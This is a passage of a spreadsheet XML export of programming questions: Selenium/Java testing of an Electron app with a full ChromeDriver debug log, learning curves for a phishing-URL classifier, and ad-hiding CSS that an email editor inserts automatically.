 &lt;p&gt;Do someone know what could be going on ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firebase&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can I test an Electron application using Java?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have Electron version 23.1.1 and corresponding chromium version is 110.0.5481.104.
 Link for this: &lt;code&gt;https://github.com/electron/electron/releases/tag/v23.1.1&lt;/code&gt;
 I downloaded chromedriver-v23.1.1-win32-x64.zip from the above page.&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;I started a small test but the only step I get is opening the application and than this message in console &amp;quot;Caused by: org.openqa.selenium.NoSuchWindowException: no such window: target window already closed&amp;quot;.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I am open to use anything but I don't want to ditch java for JavaScript?
 This is my code.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;
 import org.junit.After;
 import org.junit.Before;
 import org.junit.Test;
 import org.openqa.selenium.By;
 import org.openqa.selenium.Capabilities;
 import org.openqa.selenium.WebDriver;
 import org.openqa.selenium.WebElement;
 import org.openqa.selenium.chrome.ChromeDriver;
 import org.openqa.selenium.chrome.ChromeOptions;
 import org.openqa.selenium.remote.RemoteWebDriver;
 import org.openqa.selenium.support.ui.ExpectedConditions;
 import org.openqa.selenium.support.ui.WebDriverWait;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import java.time.Duration;
 import java.util.Set;
 public class LoginTest {
  private final Logger LOGGER = LoggerFactory.getLogger(LoginTest.class);
  private WebDriver driver = null;
  private ChromeOptions options;
  private WebElement inputPOSUser;
  private WebElement clickNextButton;
  @Before
  public void Setup(){
  options = new ChromeOptions();
  System.setProperty(&amp;quot;webdriver.chrome.driver&amp;quot;, &amp;quot;C:\\CustomChromeDriver\\chromedriver_win32\\chromedriver.exe&amp;quot;);
  System.setProperty(&amp;quot;webdriver.chrome.verboseLogging&amp;quot;, &amp;quot;true&amp;quot;);
  options.setBinary(&amp;quot;C:\\PATH\\TO\\ELECTRONAPP.exe&amp;quot;);
  options.addArguments(&amp;quot;start-maximized&amp;quot;); 
  options.addArguments(&amp;quot;--remote-debugging-port=9222&amp;quot;); //9222
  if (driver == null){
  driver = new ChromeDriver(options);
  WebDriverWait wait = new WebDriverWait(driver, Duration.ofSeconds(10) );
  //for printing browser name and version
  Capabilities cp = ((RemoteWebDriver) driver).getCapabilities();
  System.out.println(&amp;quot;Browser: &amp;quot; + cp.getBrowserName());
  System.out.println(&amp;quot;Version: &amp;quot; + cp.getBrowserVersion());
  try {
  Thread.sleep(10000);
 // switchToNewWindow(driver);
  inputPOSUser= wait.until(ExpectedConditions.visibilityOfElementLocated(By.id(&amp;quot;login-username-input&amp;quot;)));
  driver.findElement(By.id(&amp;quot;login-login-button&amp;quot;));
  } catch (InterruptedException e) {
  throw new RuntimeException(e);
  }
  }
  }
  @Test
  public void TestL(){
  LOGGER.info(&amp;quot;Step&amp;quot;);
  String User = &amp;quot;newuser&amp;quot;;
  driver.get(&amp;quot;http://localhost:4202/login&amp;quot;);
  inputPOSUser.sendKeys(User);
  LOGGER.info(&amp;quot;entered login name&amp;quot;);
  clickNextButton.click();
  }
  @After
  public void teardown() {
  if (driver != null)
  driver.quit();
  }
  public void switchToNewWindow(WebDriver driver)
  {
  String mainWindow = driver.getWindowHandle();
  Set&amp;lt;String&amp;gt; openedWindows = driver.getWindowHandles();
  if(openedWindows.size() &amp;gt; 1)
  {
  for(String newWindow : openedWindows)
  {
  driver.switchTo().window(newWindow);
  }
  driver.close();
  LOGGER.info(&amp;quot;Closing the current Opened Window - Invoice&amp;quot;);
  driver.switchTo().window(mainWindow);
  }
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This is the console&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;quot;
 log4j:WARN No appenders could be found for logger (LoginTest).
 log4j:WARN Please initialize the log4j system properly.
 log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.
 Starting ChromeDriver 110.0.5481.104 (46de4a7f41979e829b430bc1ee30ef483aa227ac-refs/branch-heads/5481_77@{#19}) on port 7863
 Only local connections are allowed.
 Please see https://chromedriver.chromium.org/security-considerations for suggestions on keeping ChromeDriver safe.
 ChromeDriver was started successfully.
 [1687340263.626][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] COMMAND InitSession {
  &amp;quot;capabilities&amp;quot;: {
  &amp;quot;firstMatch&amp;quot;: [ {
  &amp;quot;browserName&amp;quot;: &amp;quot;chrome&amp;quot;,
  &amp;quot;goog:chromeOptions&amp;quot;: {
  &amp;quot;args&amp;quot;: [ &amp;quot;start-maximized&amp;quot;, &amp;quot;enable-automation&amp;quot;, &amp;quot;--no-sandbox&amp;quot;, &amp;quot;--remote-debugging-port=9222&amp;quot; ],
  &amp;quot;binary&amp;quot;: &amp;quot;C:\\AFC\\PointOfSale\\PointOfSale.exe&amp;quot;,
  &amp;quot;extensions&amp;quot;: [ ]
  }
  } ]
  },
  &amp;quot;desiredCapabilities&amp;quot;: {
  &amp;quot;browserName&amp;quot;: &amp;quot;chrome&amp;quot;,
  &amp;quot;goog:chromeOptions&amp;quot;: {
  &amp;quot;args&amp;quot;: [ &amp;quot;start-maximized&amp;quot;, &amp;quot;enable-automation&amp;quot;, &amp;quot;--no-sandbox&amp;quot;, &amp;quot;--remote-debugging-port=9222&amp;quot; ],
  &amp;quot;binary&amp;quot;: &amp;quot;C:\\AFC\\PointOfSale\\PointOfSale.exe&amp;quot;,
  &amp;quot;extensions&amp;quot;: [ ]
  }
  }
 }
 [1687340263.629][INFO]: Populating Preferences file: {
  &amp;quot;alternate_error_pages&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;autofill&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;browser&amp;quot;: {
  &amp;quot;check_default_browser&amp;quot;: false
  },
  &amp;quot;distribution&amp;quot;: {
  &amp;quot;import_bookmarks&amp;quot;: false,
  &amp;quot;import_history&amp;quot;: false,
  &amp;quot;import_search_engine&amp;quot;: false,
  &amp;quot;make_chrome_default_for_user&amp;quot;: false,
  &amp;quot;skip_first_run_ui&amp;quot;: true
  },
  &amp;quot;dns_prefetching&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;profile&amp;quot;: {
  &amp;quot;content_settings&amp;quot;: {
  &amp;quot;pattern_pairs&amp;quot;: {
  &amp;quot;https://*,*&amp;quot;: {
  &amp;quot;media-stream&amp;quot;: {
  &amp;quot;audio&amp;quot;: &amp;quot;Default&amp;quot;,
  &amp;quot;video&amp;quot;: &amp;quot;Default&amp;quot;
  }
  }
  }
  },
  &amp;quot;default_content_setting_values&amp;quot;: {
  &amp;quot;geolocation&amp;quot;: 1
  },
  &amp;quot;default_content_settings&amp;quot;: {
  &amp;quot;geolocation&amp;quot;: 1,
  &amp;quot;mouselock&amp;quot;: 1,
  &amp;quot;notifications&amp;quot;: 1,
  &amp;quot;popups&amp;quot;: 1,
  &amp;quot;ppapi-broker&amp;quot;: 1
  },
  &amp;quot;password_manager_enabled&amp;quot;: false
  },
  &amp;quot;safebrowsing&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;search&amp;quot;: {
  &amp;quot;suggest_enabled&amp;quot;: false
  },
  &amp;quot;translate&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  }
 }
 [1687340263.633][INFO]: Populating Local State file: {
  &amp;quot;background_mode&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;ssl&amp;quot;: {
  &amp;quot;rev_checking&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  }
  }
 }
 [1687340263.637][INFO]: Launching chrome: &amp;quot;C:\AFC\PointOfSale\PointOfSale.exe&amp;quot; --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=9222 --start-maximized --test-type=webdriver --use-mock-keychain --user-data-dir=&amp;quot;C:\Users\UserProfile\AppData\Local\Temp\scoped_dir117580_1083242216&amp;quot; data:,
 [1687340263.651][DEBUG]: DevTools HTTP Request: http://localhost:9222/json/version
 [1687340264.226][DEBUG]: DevTools HTTP Response: {
  &amp;quot;Browser&amp;quot;: &amp;quot;Chrome/110.0.5481.104&amp;quot;,
  &amp;quot;Protocol-Version&amp;quot;: &amp;quot;1.3&amp;quot;,
  &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) PointOfSale/1.0.0 Chrome/110.0.5481.104 Electron/23.1.1 Safari/537.36&amp;quot;,
  &amp;quot;V8-Version&amp;quot;: &amp;quot;11.0.226.16&amp;quot;,
  &amp;quot;WebKit-Version&amp;quot;: &amp;quot;537.36 (@46de4a7f41979e829b430bc1ee30ef483aa227ac)&amp;quot;,
  &amp;quot;webSocketDebuggerUrl&amp;quot;: &amp;quot;ws://localhost:9222/devtools/browser/bd8c11d3-9ff1-4a4c-9ce9-fdb9619d0210&amp;quot;
 }
 [1687340264.226][DEBUG]: DevTools HTTP Request: http://localhost:9222/json/list
 [1687340264.228][DEBUG]: DevTools HTTP Response: [ {
  &amp;quot;description&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;devtoolsFrontendUrl&amp;quot;: &amp;quot;/devtools/inspector.html?ws=localhost:9222/devtools/page/3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;id&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;title&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;type&amp;quot;: &amp;quot;page&amp;quot;,
  &amp;quot;url&amp;quot;: &amp;quot;file:///C:/AFC/PointOfSale/resources/app.asar/html/start.html&amp;quot;,
  &amp;quot;webSocketDebuggerUrl&amp;quot;: &amp;quot;ws://localhost:9222/devtools/page/3D5D926A00E7B99A43C30D657DB31A66&amp;quot;
 } ]
 [1687340264.255][INFO]: resolved localhost to [&amp;quot;::1&amp;quot;,&amp;quot;127.0.0.1&amp;quot;]
 [1687340264.257][WARNING]: virtual void DevToolsClientImpl::AddListener(DevToolsEventListener *) subscribing a listener to the already connected DevToolsClient. Connection notification will not arrive.
 [1687340264.258][DEBUG]: DevTools WebSocket Command: Target.getTargets (id=1) (session_id=) browser {
 }
 [1687340264.259][DEBUG]: DevTools WebSocket Response: Target.getTargets (id=1) (session_id=) browser {
  &amp;quot;targetInfos&amp;quot;: [ {
  &amp;quot;attached&amp;quot;: false,
  &amp;quot;browserContextId&amp;quot;: &amp;quot;9EEB1F223152D98321FD4F4558501009&amp;quot;,
  &amp;quot;canAccessOpener&amp;quot;: false,
  &amp;quot;targetId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;title&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;type&amp;quot;: &amp;quot;page&amp;quot;,
  &amp;quot;url&amp;quot;: &amp;quot;file:///C:/AFC/PointOfSale/resources/app.asar/html/start.html&amp;quot;
  } ]
 }
 [1687340264.259][DEBUG]: DevTools WebSocket Command: Target.attachToTarget (id=2) (session_id=) browser {
  &amp;quot;flatten&amp;quot;: true,
  &amp;quot;targetId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;
 }
 [1687340264.260][DEBUG]: DevTools WebSocket Event: Target.attachedToTarget (session_id=) browser {
  &amp;quot;sessionId&amp;quot;: &amp;quot;C5798C306B0019F541FAFF88D3DDC14B&amp;quot;,
  &amp;quot;targetInfo&amp;quot;: {
  &amp;quot;attached&amp;quot;: true,
  &amp;quot;browserContextId&amp;quot;: &amp;quot;9EEB1F223152D98321FD4F4558501009&amp;quot;,
  &amp;quot;canAccessOpener&amp;quot;: false,
  &amp;quot;targetId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;title&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;type&amp;quot;: &amp;quot;page&amp;quot;,
  &amp;quot;url&amp;quot;: &amp;quot;file:///C:/AFC/PointOfSale/resources/app.asar/html/start.html&amp;quot;
  },
  &amp;quot;waitingForDebugger&amp;quot;: false
 }
 [1687340264.260][DEBUG]: DevTools WebSocket Response: Target.attachToTarget (id=2) (session_id=) browser {
  &amp;quot;sessionId&amp;quot;: &amp;quot;C5798C306B0019F541FAFF88D3DDC14B&amp;quot;
 }
 [1687340264.260][DEBUG]: DevTools WebSocket Command: Page.addScriptToEvaluateOnNewDocument (id=3) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;source&amp;quot;: &amp;quot;(function () {window.cdc_adoQpoasnfa76pfcZLmcfl_Array = window.Array;window.cdc_adoQpoasnfa76pfcZLmcfl_Promise = window.Promise;window.cdc_adoQpoasnfa76pfcZLmcfl_Symbol = window.Symbol;}) ();&amp;quot;
 }
 [1687340264.260][DEBUG]: DevTools WebSocket Command: Runtime.evaluate (id=4) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;expression&amp;quot;: &amp;quot;(function () {window.cdc_adoQpoasnfa76pfcZLmcfl_Array = window.Array;window.cdc_adoQpoasnfa76pfcZLmcfl_Promise = window.Promise;window.cdc_adoQpoasnfa76pfcZLmcfl_Symbol = window.Symbol;}) ();&amp;quot;
 }
 [1687340264.261][DEBUG]: DevTools WebSocket Command: Log.enable (id=5) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.261][DEBUG]: DevTools WebSocket Command: Target.setAutoAttach (id=6) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;autoAttach&amp;quot;: true,
  &amp;quot;flatten&amp;quot;: true,
  &amp;quot;waitForDebuggerOnStart&amp;quot;: false
 }
 [1687340264.261][DEBUG]: DevTools WebSocket Command: Page.enable (id=7) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.262][DEBUG]: DevTools WebSocket Command: Page.enable (id=8) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Page.addScriptToEvaluateOnNewDocument (id=3) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;identifier&amp;quot;: &amp;quot;1&amp;quot;
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Runtime.evaluate (id=4) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;result&amp;quot;: {
  &amp;quot;type&amp;quot;: &amp;quot;undefined&amp;quot;
  }
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Log.enable (id=5) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Target.setAutoAttach (id=6) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Page.enable (id=7) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Response: Page.enable (id=8) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.294][DEBUG]: DevTools WebSocket Command: Runtime.enable (id=9) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.295][DEBUG]: DevTools WebSocket Event: Page.domContentEventFired (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;timestamp&amp;quot;: 1207352.837148
 }
 [1687340264.298][DEBUG]: DevTools WebSocket Event: Runtime.executionContextCreated (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;context&amp;quot;: {
  &amp;quot;auxData&amp;quot;: {
  &amp;quot;frameId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;isDefault&amp;quot;: false,
  &amp;quot;type&amp;quot;: &amp;quot;isolated&amp;quot;
  },
  &amp;quot;id&amp;quot;: 2,
  &amp;quot;name&amp;quot;: &amp;quot;Electron Isolated Context&amp;quot;,
  &amp;quot;origin&amp;quot;: &amp;quot;file://&amp;quot;,
  &amp;quot;uniqueId&amp;quot;: &amp;quot;-4165743087318469963.1924850320221961557&amp;quot;
  }
 }
 [1687340264.298][DEBUG]: DevTools WebSocket Event: Runtime.executionContextCreated (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;context&amp;quot;: {
  &amp;quot;auxData&amp;quot;: {
  &amp;quot;frameId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;,
  &amp;quot;isDefault&amp;quot;: true,
  &amp;quot;type&amp;quot;: &amp;quot;default&amp;quot;
  },
  &amp;quot;id&amp;quot;: 1,
  &amp;quot;name&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;origin&amp;quot;: &amp;quot;file://&amp;quot;,
  &amp;quot;uniqueId&amp;quot;: &amp;quot;-966553648842666591.1831066268359020716&amp;quot;
  }
 }
 [1687340264.298][DEBUG]: DevTools WebSocket Response: Runtime.enable (id=9) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.298][DEBUG]: DevTools WebSocket Command: Page.enable (id=10) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.300][DEBUG]: DevTools WebSocket Response: Page.enable (id=10) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.300][DEBUG]: DevTools WebSocket Command: Runtime.enable (id=11) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.310][DEBUG]: DevTools WebSocket Event: Page.loadEventFired (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;timestamp&amp;quot;: 1207352.842856
 }
 [1687340264.310][DEBUG]: DevTools WebSocket Command: Runtime.evaluate (id=12) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;awaitPromise&amp;quot;: false,
  &amp;quot;expression&amp;quot;: &amp;quot;document.readyState&amp;quot;,
  &amp;quot;returnByValue&amp;quot;: true
 }
 [1687340264.310][DEBUG]: DevTools WebSocket Event: Page.frameStoppedLoading (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;frameId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;
 }
 [1687340264.310][DEBUG]: DevTools WebSocket Response: Runtime.enable (id=11) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
 }
 [1687340264.311][DEBUG]: DevTools WebSocket Response: Runtime.evaluate (id=12) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;result&amp;quot;: {
  &amp;quot;type&amp;quot;: &amp;quot;string&amp;quot;,
  &amp;quot;value&amp;quot;: &amp;quot;complete&amp;quot;
  }
 }
 [1687340264.312][DEBUG]: DevTools WebSocket Command: Runtime.evaluate (id=13) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;awaitPromise&amp;quot;: true,
  &amp;quot;expression&amp;quot;: &amp;quot;(function() { // Copyright 2012 The Chromium Authors\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n/**\n * Enum for WebDriver status codes....&amp;quot;,
  &amp;quot;returnByValue&amp;quot;: true
 }
 [1687340264.315][DEBUG]: DevTools WebSocket Response: Runtime.evaluate (id=13) (session_id=C5798C306B0019F541FAFF88D3DDC14B) 3D5D926A00E7B99A43C30D657DB31A66 {
  &amp;quot;result&amp;quot;: {
  &amp;quot;type&amp;quot;: &amp;quot;object&amp;quot;,
  &amp;quot;value&amp;quot;: {
  &amp;quot;status&amp;quot;: 0,
  &amp;quot;value&amp;quot;: 1
  }
  }
 }
 [1687340264.315][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] RESPONSE InitSession {
  &amp;quot;capabilities&amp;quot;: {
  &amp;quot;acceptInsecureCerts&amp;quot;: false,
  &amp;quot;browserName&amp;quot;: &amp;quot;chrome&amp;quot;,
  &amp;quot;browserVersion&amp;quot;: &amp;quot;110.0.5481.104&amp;quot;,
  &amp;quot;chrome&amp;quot;: {
  &amp;quot;chromedriverVersion&amp;quot;: &amp;quot;110.0.5481.104 (46de4a7f41979e829b430bc1ee30ef483aa227ac-refs/branch-heads/5481_77@{#19})&amp;quot;,
  &amp;quot;userDataDir&amp;quot;: &amp;quot;C:\\Users\\UserProfile\\AppData\\Local\\Temp\\scoped_dir117580_1083242216&amp;quot;
  },
  &amp;quot;goog:chromeOptions&amp;quot;: {
  &amp;quot;debuggerAddress&amp;quot;: &amp;quot;localhost:9222&amp;quot;
  },
  &amp;quot;networkConnectionEnabled&amp;quot;: false,
  &amp;quot;pageLoadStrategy&amp;quot;: &amp;quot;normal&amp;quot;,
  &amp;quot;platformName&amp;quot;: &amp;quot;windows&amp;quot;,
  &amp;quot;proxy&amp;quot;: {
  },
  &amp;quot;setWindowRect&amp;quot;: true,
  &amp;quot;strictFileInteractability&amp;quot;: false,
  &amp;quot;timeouts&amp;quot;: {
  &amp;quot;implicit&amp;quot;: 0,
  &amp;quot;pageLoad&amp;quot;: 300000,
  &amp;quot;script&amp;quot;: 30000
  },
  &amp;quot;unhandledPromptBehavior&amp;quot;: &amp;quot;dismiss and notify&amp;quot;,
  &amp;quot;webauthn:extension:credBlob&amp;quot;: true,
  &amp;quot;webauthn:extension:largeBlob&amp;quot;: true,
  &amp;quot;webauthn:virtualAuthenticators&amp;quot;: true
  },
  &amp;quot;sessionId&amp;quot;: &amp;quot;34022d8904f2f63ebd53781d89c6b5a3&amp;quot;
 }
 [1687340265.977][DEBUG]: DevTools WebSocket Event: Target.detachedFromTarget (session_id=) browser {
  &amp;quot;sessionId&amp;quot;: &amp;quot;C5798C306B0019F541FAFF88D3DDC14B&amp;quot;,
  &amp;quot;targetId&amp;quot;: &amp;quot;3D5D926A00E7B99A43C30D657DB31A66&amp;quot;
 }
 [1687340274.428][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] COMMAND GetWindow {
 }
 [1687340274.453][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] RESPONSE GetWindow ERROR no such window: target window already closed
 from unknown error: web view not found
  (Session info: chrome=110.0.5481.104)
 [1687340274.462][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] COMMAND Quit {
 }
 [1687340274.515][INFO]: [34022d8904f2f63ebd53781d89c6b5a3] RESPONSE Quit
 [1687340274.515][DEBUG]: Log type 'driver' lost 1 entries on destruction
 [1687340274.515][DEBUG]: Log type 'browser' lost 0 entries on destruction
 org.openqa.selenium.NoSuchWindowException: no such window: target window already closed
 from unknown error: web view not found
  (Session info: chrome=110.0.5481.104)
 Build info: version: '4.8.1', revision: '8ebccac989'
 System info: os.name: 'Windows 10', os.arch: 'amd64', os.version: '10.0', java.version: '19.0.1'
 Driver info: org.openqa.selenium.chrome.ChromeDriver
 Command: [34022d8904f2f63ebd53781d89c6b5a3, getCurrentWindowHandle {}]
 Capabilities {acceptInsecureCerts: false, browserName: chrome, browserVersion: 110.0.5481.104, chrome: {chromedriverVersion: 110.0.5481.104 (46de4a7f419..., userDataDir: C:\Users\UserProfile\AppData\L...}, goog:chromeOptions: {debuggerAddress: localhost:9222}, networkConnectionEnabled: false, pageLoadStrategy: normal, platformName: WINDOWS, proxy: Proxy(), se:cdp: ws://localhost:9222/devtool..., se:cdpVersion: 110.0.5481.104, setWindowRect: true, strictFileInteractability: false, timeouts: {implicit: 0, pageLoad: 300000, script: 30000}, unhandledPromptBehavior: dismiss and notify, webauthn:extension:credBlob: true, webauthn:extension:largeBlob: true, webauthn:virtualAuthenticators: true}
 Session ID: 34022d8904f2f63ebd53781d89c6b5a3
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;selenium-webdriver&gt;&lt;electron&gt;&lt;selenium-chromedriver&gt;</t>
  </si>
  <si>
    <t>Is this classification model overfitting?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am performing a url classification (phishing - nonphishing) and I plotted the learning curves (training vs cross validation score) for my model (Gradient Boost). &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My View&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;It seems that these two curves converge and the difference is not significant. Tt's normal for the training set to have a slightly higher accuracy). &lt;strong&gt;(Figure 1)&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/XNxXv.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/XNxXv.png" alt="Gradient boost learning curves"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;The Question&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I have limited experience on machine learning, thus I am asking your opinion. Is the way I am approaching the problem right? Is this model fine or is it overfitting?&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Note: The classes are balanced and the features are well chosen&lt;/em&gt; &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Relevant code&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;from yellowbrick.model_selection import LearningCurve
 def plot_learning_curves(Œß, y, model):
  # Create the learning curve visualizer
  cv = StratifiedKFold(n_splits=5)
  sizes = np.linspace(0.1, 1.0, 8)
  visualizer = LearningCurve(model, cv=cv, train_sizes=sizes, n_jobs=4)
  visualizer.fit(Œß, y) # Fit the data to the visualizer
  visualizer.poof()
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;machine-learning&gt;&lt;scikit-learn&gt;&lt;classification&gt;&lt;text-classification&gt;&lt;sklearn-pandas&gt;</t>
  </si>
  <si>
    <t>I am getting CSS populated automaticaly</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using HTML Email creator/editor(I cannot share the name). I run into the problem that when I edit the email content and save it i get this bunch of CSS automatically:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;#ad-4, #ad-4-300x90, #ad-5-images, #ad-55, #ad-63, #ad-635x40-1, #ad-655, #ad-7, #ad-728, #ad-728-90, #ad-728x90-1, #ad-728x90-leaderboard-top, #ad-728x90-top, #ad-728x90-top0, #ad-732, #ad-734, #ad-74, #ad-88, #ad-88-wrap, #ad-970, #ad-98, #ad-a, #ad-a1, #ad-abs-b-0, #ad-abs-b-1, #ad-abs-b-10, #ad-abs-b-2, #ad-abs-b-3, #ad-abs-b-4, #ad-abs-b-5, #ad-abs-b-6, #ad-abs-b-7, #ad-absolute-160, #ad-ads, #ad-adsensemedium, #ad-advertorial, #ad-affiliate, #ad-around-the-web, #ad-article, #ad-article-in, #ad-aside-1, #ad-atf-mid, #ad-atf-top, #ad-ban, #ad-banner, #ad-banner-1, #ad-banner-970, #ad-banner-980, #ad-banner-atf, #ad-banner-body-top { display: none!important; }
 #ad-banner-bottom, #ad-banner-image, #ad-banner-placement, #ad-banner-top, #ad-banner-wrap, #ad-bar, #ad-base, #ad-beauty, #ad-below-content, #ad-big, #ad-bigbox, #ad-bigsize, #ad-billboard, #ad-billboard-atf, #ad-billboard-bottom, #ad-blade, #ad-block, #ad-block-125, #ad-block-bottom, #ad-block-container, #ad-border, #ad-bottom-300x250, #ad-bottom-banner, #ad-bottom-right-container, #ad-bottom-wrapper, #ad-bottomright, #ad-box, #ad-box-1, #ad-box-2, #ad-box-bottom, #ad-box-first, #ad-box-halfpage, #ad-box-leaderboard, #ad-box-rectangle, #ad-box-rectangle-2, #ad-box-right, #ad-box-second, #ad-box1, #ad-box2, #ad-boxATF, #ad-boxes, #ad-br-container, #ad-bs, #ad-btf-bot, #ad-btm, #ad-buttons, #ad-campaign, #ad-carousel, #ad-case, #ad-center { display: none!important; }
